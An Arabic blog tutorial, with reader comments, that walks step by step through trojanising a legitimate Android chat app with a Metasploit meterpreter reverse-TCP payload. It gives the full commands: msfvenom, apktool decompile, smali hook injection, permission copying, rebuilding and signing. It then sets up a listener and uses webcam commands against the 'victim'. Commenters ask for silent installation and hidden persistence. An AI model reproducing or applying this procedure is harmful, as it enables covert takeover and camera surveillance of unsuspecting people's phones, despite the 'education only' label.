دمج بايلود ميتاسبلويت مع تطبيق اندرويد الشرح الكامل

for education only.jpg

السلام عليكم

مقدمه :

تعريف البايلود ( payload ) هو ملف يصنع لك باب خلفى كما يعرف عند مستخدمى نجرات و برورات بــ server

 سوف نتعلم فى هذا الدرس كيفية حقن بايلود الميتاسبلويت داخل تطبيق اندرويد بالطريقه الصحيحه والصعبه ولكن مع المتابعه الواعيه سوف تجد الامر لا يستغرق 5 دقائق ان استوعبته

 

لحمايه نفسك من مثل هذه التطبيقات

تاكد من ان خيار ( تثبيت تطبيقات من مصادر خارجيه )  غير مفعل عندك

كما انك عبر هذا الدرس سوف تتعلم اعطاء تصاريح والغائها يمكنك الغاء ما تريد وتستخدم التطبيق ( ابدع )

الادوات المستخدمة :

  • apktool
  • metasploit

اولا تاكد من وجود هذا الادوات عندك افتح ترمينال واكتب

apktool

Screenshot from 2016-09-06 09-29-18.png

msfconsole

Screenshot from 2016-09-06 09-53-11.png

اذا فتحت معك مثل هذا فهى عندك

فى حالة عدم وجودهم هذه روابط التحميل

apktool install

https://ibotpeaches.github.io/Apktool/install/

metasploit

https://help.rapid7.com/metasploit/Content/installation/installing-msf.html

خطوات العمل:

بما ان الدرس كبير سوف اعطيكم لمحة موجزه عن ما نحن بصدد القيام به

  1. انشاء بايلود ميتاسبلويت

  2. فك بايلود الميتاسبلويت وتطبيق الاندرويد

  3. نسخ ملفات البايلود الى تطبيق الاندرويد

  4. حقن هوك فى ملف التشغيل الرئيسى للتطبيق

  5. حقن التصاريح فى ملف التصاريح داخل التطبيق

  6. اعادة تجميع التطبيق الى ملف apk

  7. تسجيل التطبيق

  8. الاستماع والاتصال بالضحيه

وسوف نشرح استخدام جلسة meterpreter للاتصال بالتطبيق

قبل اى شىء قم باتشاء فولدر فوق سطح المكتب وهو ما سوف يحتوى على البايلود والتطبيق الاصلى عن طريق الامر التالى

1- انشاء فولدر

mkdir Desktop/android

2- الانتقال اليه

cd Desktop/android

بدون عنوان-1.jpg

الخطوه الاولى:

وانت داخل فولدر android قم بتنفيز الامر التالى مع تعديله حسب بياناتك

انشاء بايلود ميتاسبلويت بامتداد apk

قبل اى شىء لابد من انشاء بايلود meterpreter عن طريق امر msfvenom

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk

1- استبدل payload_type باى نوع بايلود

هناك العديد من البايلود وكلها تعمل على الاتصال بنظامك من داخل التطبيق الاختلاف فقط فى طريقه الاتصال بك

  • وهذه هى البايلودات المتاحه
  • reverse_tcp
  • reverse_http
  • reverse_https

2- استبدل ip_address بعنوان الاى بى الخاص بك

لمعرفة عنوان الاى بى الخاص بك اكتب فى ترمينال ifconfig

Screenshot from 2016-09-06 10-51-06.jpg

3- استبدل incoming_port باى بورت تريد وليكن 4444

ولكن تذكر هذا الرقم لاننا سوف نستخدمه فى الاستماع

4- استبدل meterpreter.apk باى اسم تريد وليكن payload.apk

هذا هو الكود بعد تعبئة البيانات:-

msfvenom -p android/meterpreter/reverse_tcp LHOST=55.0.0.10 LPORT=4444 -o payload.apk

بدون عنوان-1.jpg

وها هو ملف البايلود

212111.jpg

قم بتحميل اى تطبيق ووضعه داخل مجلد android

Screenshot 1.png

الخطوه الثانيه:

فك التطبيق الاصلى والبايلود

حتى نستطيع التعديل على برمجة التطبيق علينا فك التطبيق باداة apktool ليكون بلغة البشر وليس الاله

من نفس الفولدر المحتوى على التطبيق والبايلود نفذ الاوامر الاتيه

فك التطبيق الاصلى

apktool d -f -o chat chat.apk

فك البايلود

apktool d -f -o payload payload.apk

Screenshot 2.png

بعد فك التطبيق والبايلود ينتج عنهما فولدر البايلود وفولدر التطبيق

Screenshot 3.png

الخطوه الثالثه:

نسخ ملفات البايلود الى التطبيق عن طريق الامر التالى

cp payload/smali/com/* -R chat/smali/com

Screenshot 4.png

الخطوه الرابعه :

حقن هوك فى ملف التشغيل الرئيسى للتطبيق

الهوك هو ما سيقوم بتشغيل البايلود الذى قمنا بنسخه فى الخطوه السابقه فبدونه لن يحدث اى شىء وهى خطوه مهمه جدا وتحتاج الى تركيز وتشغيل مخ

افتح فولدر التطبيق ثم افتح ملف AndroidManifest.xml بواسطة محرر النصوص

ثم ابحث عن كلمة LAUNCHER

Screenshot 6.png

كما ترى فوق كلمة LUNCHER يوجد مسار واجهة تسجيل الدخول الرئيسيه

me.antichat.activities.loginactivity

هذا المسار موجود داخل فولدر com

com/me/antichat/activities.loginactivity

ملحوظه هذا المسار يختلف من تطبيق لاخر وعليك معرفة المسار الحقيقى للواجهة الرئيسيه لانه من الممكن ان تضع الكود فى واجهه فرعيه فلن يعمل الكود الا اذا فتح المستخدم تلك الواجهه

Screenshot 7.png

بعد التوجه للمسار نجد الملف باسم LoginActivity.smali نقوم بفتحه بمحرر النصوص

Screenshot 8.png

نبحث عن جملة

;->onCreate(Landroid/os/Bundle;)V

عند ايجاد هذه الجمله على الفور ضع هذا الكود فى السطر الذى يليها

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Screenshot 9.png

ثم احفظ الملف واغلقه

 

الخطوه الخامسه :

حقن التصاريح فى AndroidManifest.xml التصاريح داخل التطبيق

التصاريح هى ما يعطى لك الحق فى التحكم فى اشياء معينه على حسب التصريح فمنه يمكنك اعطاء تصريح الوصول للكميرا واستخدامها تسجيل الميك الوصول للملفات الخ الخ الخ

افتح ملفAndroidManifest.xml الموجود داخل التطبيق

Screenshot from 2016-09-06 14-35-44.png

جميع ما هو محدد تصاريح التطبيق الاصليه

نفتح ملفAndroidManifest.xml الموجود داخل فولدر البايلود

Screenshot from 2016-09-06 14-35-57.png

انسخ جميع التصاريح المحدده فى الصوره او اختر منها ما تريد والصقه فى ملف AndroidManifest.xml الموجود فى فولدر التطبيق اسفل التصاريح الاصليه

Screenshot from 2016-09-06 14-37-47.png

ثم احفظ الملف واغلقه

الخطوه السادسه :

اعادة تجميع التطبيق الى ملف apk

بعد ان دمجنا ملفات البايلود وحقنا الهوك والتصاريح علينا الان جمع التطبيق المزيف الى ملف apk حتى يعمل على هواتف اندرويد

ادخل الامر التالى

apktool b chat

Screenshot from 2016-09-06 14-39-29.png

بعد جمع التطبيق من جديد تجد ملف التطبيق الملغم فى هذا المسار

chat/dist/chat.apk

انتظر لم ننتهى بعد تبقى اخر خطوه

الخطوه السابعه :

تسجيل التطبيق

هى اهم خطوه والكثير يفشل بسببها

بدون تسجيل التطبيق لن يعمل وسوف تواجهك مشكلة توقف التطبيق والتسجيل هو عباره عن ملىء بيانات المؤلف للتطبيق

اذا كان لديك مفتاح ترخيص استخدمه اذا لم يكن لديك قم بانشاء مفتاح جديد عبر الاتى

امر انشاء مفتاح ترخيص

keytool -genkey -v -keystore keyname.keystore -alias aliasname -keyalg RSA -keysize 2048 -validity 10000

  • keyname هو اسم المفتاح عدله حسب ما تريد
  • alisename هو الاسم المستعار عدله حسب ما تريد
  • 10000 هو عدد الايام التى سينتهى مفعول التطبيق بعدها انصحك لا تعدلها

Screenshot from 2016-09-06 14-45-06.png

بعد تنفيذ الكود السابق سوف يطلب منك الاتى

enter keystore password: اكتب كلمة سر

re-enter new password: تاكيد كلمة السر

what is your first and last name: اسمك

what is the name of your organizathional unit: اسم منظمتك

what is the name of your organizathional: اسم المنظمه

what is the name of your city or locality : بلدك

what is the name of your state or province: محافظتك

what is the two-letter country code for this unit : اكتب حرفين

بعدها يسالك هل هذه البيانات صحيحه اكتب yes

RETURN if same as keystore password : اضغط انتر لنفس كلمة السر السابقه

الان انتهينا من انشاء مفتاح ترخيص جديد

الان نسجل التطبيق بهذا المفتاح

امر تسجيل التطبيق

jarsigner -verbose -keystore keyname.keystore -digestalg SHA1 -sigalg MD5withRSA chat/dist/chat.apk aliasname

  • keyname.keystore : اسم المفتاح الذى صنعناه مسبقا
  • chat/dist/chat.apk : مسار ملف التطبيق المزيف
  • aliasname : الاسم المستعار الذى صنعناه مسبقا

Screenshot from 2016-09-06 14-47-09.png

سوف يطلب منك ادخال كلمة السر التى صنعناها عند انشاء المفتاح ادخلها واضغط enter

الان انتهينا من صناعة التطبيق

لا يتبقى سوى ارسال التطبيق الى الضحيه وتشغيله والخطوه التاليه الاتصال بالتطبيق والتحكم بهاتف الضحيه

ملحوظه : هذا التطبيق تم صنعه للاختراق داخل الشبكة وليس خارجها على حسب الاى بى داخلى او خارجى

ملحوظه : هذا التطبيق لن يتم تثبيته الا اذا كنت مفعل خيار تثبيت تطبيقات من مصادر خارجيه

الخطوه الثامنه :

الاستماع والاتصال بالضحيه

حتى نستطيع الاتصال بالضحيه يجب تشغيل الاستماع

عن طريق اداة ميتاسبلويت

قم بتشغيل اداة الميتاسبلويت عن طريق الامر التالى

msfconsole

Screenshot from 2016-09-06 14-49-29.png

بعد تشغيل الميتاسبلويت قم بتعبئة البيانات كالاتى

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 55.0.0.10

set LPORT  4444

exploit

استبدل LHOST و LPORT ببيانات البايلود الخاص بك

بعد تشغيل الاستماع قم بتشغيل التطبيق على هاتفك للتجربه عند نجاح الاتصال سوف يظهر لك meterpreter كالاتى

Screenshot from 2016-09-06 14-49-46.png

الان نجح الاتصال واصبحت داخل هاتف الضحيه

لرؤية كافة الاوامر المتاحه فى meterpreter اكتب help

وسوف تظهر لك كل الاوامر كالاتى

Screenshot from 2016-09-06 14-50-21.png

واليك بعض الاوامر الخاصه بالاندرويد

webcam_list     معرفة عدد الكميرات المتاحه فى هاتف الضحيه

webcam_snap      اخذ صوره بكاميرا الضحيه

webcam_snap 1 اخذ صوره بالكاميرا الاولى او الخلفيه

webcam_stream تشغيل الكميرا لتصوير فيديو مباشر

Screenshot from 2016-09-06 16-01-07.png

كما ترى عندما نفذت امر webcam_list اخبرنى انه توجد كاميرا واحده فقط

هههههههههه فعلا جهازى يحتوى على كاميرا واحده لانى اكره الاماميه فهى تصور فى صمت وبدون علمك

ثانيا نفذت امر webcam_snap فقام باخذ صوره وحفظها على جهازى

وها هى الصوره التى التقطتها عبر التطبيق المزيف

URqGiyPi.jpeg

الى الان انتهى المرح ولكن دروسنا لم تنتهى بعد فمازلت هناك اساليب اخرى

تابعنا عبر صفحتنا على فيسبوك >>>> https://www.facebook.com/el2tlinux
للاساله توجه لصفحتنا على فيسبوك وابحث عن الدرس وضع مشكلتك مرفق معها سكرين شوت للمشكله

تحياتى لكم

القط

13 comments

  1. سيدي الفاضل
    قرأت انه يمكن جعل الapk payload يسطب نفسه علي الجهاز الهدف بدون أخذ أذن صاحب الهاتف عن طريق تغيير بعض الاوامر في ال apk عن طريق
    dexclasssloader …. هل اطمع في كرم حضرتك بالشرح لو تعرف هذه الطريقة أو ان تدلني اين أجدها مشروحة بالتفصيل ……
    شكرا جزيلا مقدما

    Liked by 1 person

  2. اليلام عليكم
    شرح كامل ورائع
    عندي سؤال وهو أني جربت الطريقة ونجحت ولاكن عندما يخرج الضحية من التطبيق الذي أنشأناه يتم فقدان الإتصال هل توجد طريقة لجعله عندما يخرج الضحية يبقى الإتصال يعني يكون حقن ملف apk الخاص بالميتا سبلويت في ملفات النظام وإخفاءه من التطبيقات
    أتمنى ترد علي بسرعة إذا هناك طريقة إشرحلي ياها في التعليق أو في تدوينة وإذا لايوجد إشرح طريقة حقن تطبيق الميتا بدون دمجه
    وشكرااااااااااااااااااااااااااااااااااااااااااااااااااااا

    Liked by 1 person

  3. This virtual machine is configured for 64-bit guest operating systems. However, 64-bit operation is not possible.

    This host supports Intel VT-x, but Intel VT-x is disabled.

    Intel VT-x might be disabled if it has been disabled in the BIOS/firmware settings or the host has not been power-cycled since changing this setting.

    (1) Verify that the BIOS/firmware settings enable Intel VT-x and disable ‘trusted execution.’

    (2) Power-cycle the host if either of these BIOS/firmware settings have been changed.

    (3) Power-cycle the host if you have not done so since installing VMware Workstation.

    (4) Update the host’s BIOS/firmware to the latest version.
    السلام عليكم ورحمه الله
    بشكرك ع مجهودك الجبار دا
    استفسار لو سمحت
    الرساله دي جاتلى وانا بثبت النظام الوهمى على الفيموير اول ما ضغطت علي start
    ممكن توضيح
    وشكرا

    إعجاب

    • السلام وعليكم اخي

      اول ما تشغل جهاز الكمبيوتر سوف تظهرلك كتابة اضغط على الزر المكتوب (يختلف حسب نوع الجهاز) سوف تظهر لك قائمة ابحث عن كلمة BIOS واضغط الزر المشار الية تفتح لك قائمة اخرى تصفح وابحث عن VT-x على الارجح سوف تجده disable غيرة الى enable وماتغير شيء اخر اخرج مع حفظ البيانات وارجع للفيمور وتشوف ان الرسالة اختفت
      الخلاصة ان البرنامج يطلب تصريح لعمل نظام وهمي وات منحتا هذة الميزة من البيوس

      إعجاب

  4. لم اجد المسار تبع المسار الحقيقى للواجهة الرئيسيه انا ايضا … ومشكلتي الاخرى تظهر لي رسالة بعد فتح النطبيق تم ايقاف البرنامج … ما الحل

    إعجاب

اترك رداً على مجدي إلغاء الرد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار وردبرس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s